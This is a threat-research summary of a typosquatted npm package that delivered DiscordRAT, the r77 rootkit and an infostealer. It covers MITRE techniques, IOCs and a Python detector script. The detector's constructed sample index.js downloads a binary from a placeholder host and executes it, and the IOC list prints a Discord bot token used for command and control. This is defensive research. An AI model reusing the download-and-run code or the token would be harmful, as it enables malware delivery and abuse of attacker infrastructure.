Key points
- Researchers found a typosquatting npm package named node-hide-console-windows that mimicked the legitimate node-hide-console-window package to trick developers.
- The package’s main file (index.js) downloaded and immediately executed a DiscordRAT 2.0 binary from the internet.
- DiscordRAT 2.0 used a Discord bot (bot token and guild) as its C2, creating a channel per victim and accepting commands including !rootkit and !unrootkit.
- The !rootkit command launched the r77 fileless ring‑3 rootkit, which hides files/processes and creates registry subkeys to conceal the executable path and process.
- Later versions of the package also fetched an additional PyInstaller binary labelled “visual code update,” identified as Blank‑Grabber infostealer.
- ReversingLabs published IOCs including package SHA1s and second‑stage payload SHA1s and reported the packages to npm maintainers for takedown.
- The campaign was small (≈700 downloads) but notable as an instance of open‑source components being used to deliver a rootkit via a public package repository.
MITRE Techniques
- [T1195] Supply Chain Compromise – Attackers used typosquatting to publish a malicious npm package impersonating a legitimate module (‘a technique known as typosquatting, in which cybercriminals stand up malicious packages with names that closely resemble legitimate and widely used open source modules’).
- [T1105] Ingress Tool Transfer – The package’s index.js fetched an external executable and executed it (‘it fetched an executable that was detonated immediately thereafter’).
- [T1102] Web Service – Discord was used as the command-and-control channel for the RAT, with the bot creating channels per victim (‘creates a channel in the associated Discord server – one channel for each victim’).
- [T1014] Rootkit – The r77 rootkit (fileless, ring‑3) was deployed to hide files and processes (‘r77 is a fileless ring 3 rootkit that is able to disguise files and processes’).
- [T1112] Modify Registry – r77’s deployment included creating registry subkeys to hide the executable path and process (‘two registry subkeys are created to hide the bot’s presence’).
Indicators of Compromise
- [npm package] malicious package – node-hide-console-windows (typosquat of node-hide-console-window)
- [Package SHA1] examples – cbb162d0623ff74925ecd4cfff7faef87bf45efd (node-hide-console-windows v1.5.7), af0dbb3f13dc432924092783fe30433c24b3c929 (v1.5.6), and 8 more hashes
- [Second‑stage SHA1] downloaded executables – 1563b5814b7dd655892a80be3a6cc740dad282a3, 43feaf19f1a7410358ab8cd51f00b2446d62e798
- [Credentials / Identifiers] Discord configuration – bot token MTEzNTM5NDcwMTk3ODEwODAxNg.GtdDHG.Aaj0Z8_IKQtFSG2p6VIQeDqNBvd-PkLeTD8WnE, guild ID 1140853704396902591 (embedded in DiscordRAT binary)
- [File names] malicious files – index.js (main file in package that downloads payloads), visual code update (PyInstaller executable identified as Blank‑Grabber)
ReversingLabs detected a malicious typosquatting npm package (node-hide-console-windows) during automated supply‑chain monitoring. The package’s package.json pointed to index.js as the main entry; that index.js contained clear (non‑obfuscated) code which downloaded an executable from the internet and executed it immediately. The maintainer account was newly created and the package versioning was crafted to mirror the legitimate project, which are common red flags used to identify suspicious packages.
Static and dynamic analysis of the downloaded executable identified it as DiscordRAT 2.0. The binary contained a Discord bot token and guild ID; when executed it created a Discord channel per infected host and awaited operator commands. Among the available commands was !rootkit, which launched the r77 fileless ring‑3 rootkit; deployment involved creating two registry subkeys to hide the executable path and to hide the bot’s process. Researchers also observed additional behavior in later package versions where index.js fetched a second PyInstaller‑compiled payload labeled “visual code update,” which analysts identified as Blank‑Grabber infostealer.
Key technical indicators for detection and response include the malicious package name (node-hide-console-windows), the list of package SHA1s for each published version, the two second‑stage payload SHA1s, and the embedded Discord token/guild ID used for C2. Detection strategies should include verifying package maintainer history and naming, scanning package contents (especially main entry points like index.js) for runtime downloads and execution, blocking or sandboxing downloads from unknown hosts, and comparing binaries against the published SHA1s to detect these payloads.
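A defender-side check that applies the detection strategies above, as an added Python example that is not ReversingLabs' tooling: it flags a package name within edit distance 2 of the legitimate node-hide-console-window, an entry point that both fetches from the network and spawns a process, and any file whose SHA1 matches the published IOCs. The sample package.json and index.js are constructed, and EXAMPLE-HOST is a placeholder.

```python
import hashlib
import json
import re

# SHA1s published in the report: two package versions and the two second-stage payloads.
KNOWN_BAD_SHA1 = {
    "cbb162d0623ff74925ecd4cfff7faef87bf45efd",  # node-hide-console-windows v1.5.7
    "af0dbb3f13dc432924092783fe30433c24b3c929",  # node-hide-console-windows v1.5.6
    "1563b5814b7dd655892a80be3a6cc740dad282a3",  # second-stage executable
    "43feaf19f1a7410358ab8cd51f00b2446d62e798",  # second-stage executable
}
LEGIT_NAME = "node-hide-console-window"  # the package the typosquat imitated

# Entry-point heuristic: a network fetch combined with process execution in the same file.
NETWORK_RE = re.compile(r"\b(https?\.get|fetch|axios\.get|request)\s*\(")
EXEC_RE = re.compile(r"\b(child_process|execSync|execFileSync|spawnSync|spawn|exec)\b")

def levenshtein(a, b):  # edit distance; names 1-2 characters from a legitimate package are suspect
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def scan_package(package_json, files):
    # files maps a path inside the unpacked package to its raw bytes; returns a list of findings.
    pkg = json.loads(package_json)
    findings = []
    name = pkg.get("name", "")
    if name != LEGIT_NAME and levenshtein(name, LEGIT_NAME) <= 2:
        findings.append(f"name '{name}' is within edit distance 2 of {LEGIT_NAME}")
    main = pkg.get("main", "index.js")  # npm's default entry when "main" is absent
    src = files.get(main, b"").decode("utf-8", "ignore")
    if NETWORK_RE.search(src) and EXEC_RE.search(src):
        findings.append(f"{main} fetches from the network and spawns a process")
    for path, data in files.items():
        if hashlib.sha1(data).hexdigest() in KNOWN_BAD_SHA1:
            findings.append(f"{path} matches a published IOC SHA1")
    return findings

# Constructed sample (not the real package contents): a typosquat whose index.js downloads and runs a binary.
SAMPLE_PKG_JSON = json.dumps({"name": "node-hide-console-windows", "version": "1.5.7", "main": "index.js"})
SAMPLE_INDEX_JS = b"""const https = require('https');
const { execSync } = require('child_process');
https.get('https://EXAMPLE-HOST/payload.exe', r => execSync('payload.exe'));"""

if __name__ == "__main__":
    print(*scan_package(SAMPLE_PKG_JSON, {"index.js": SAMPLE_INDEX_JS}), sep="\n")
```

Run it against an unpacked tarball by loading each file's bytes into the dict; the hash check is what catches the already-published versions, while the name and entry-point heuristics are meant to surface new ones before IOCs exist.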
Read more: https://www.reversinglabs.com/blog/r77-rootkit-typosquatting-npm-threat-research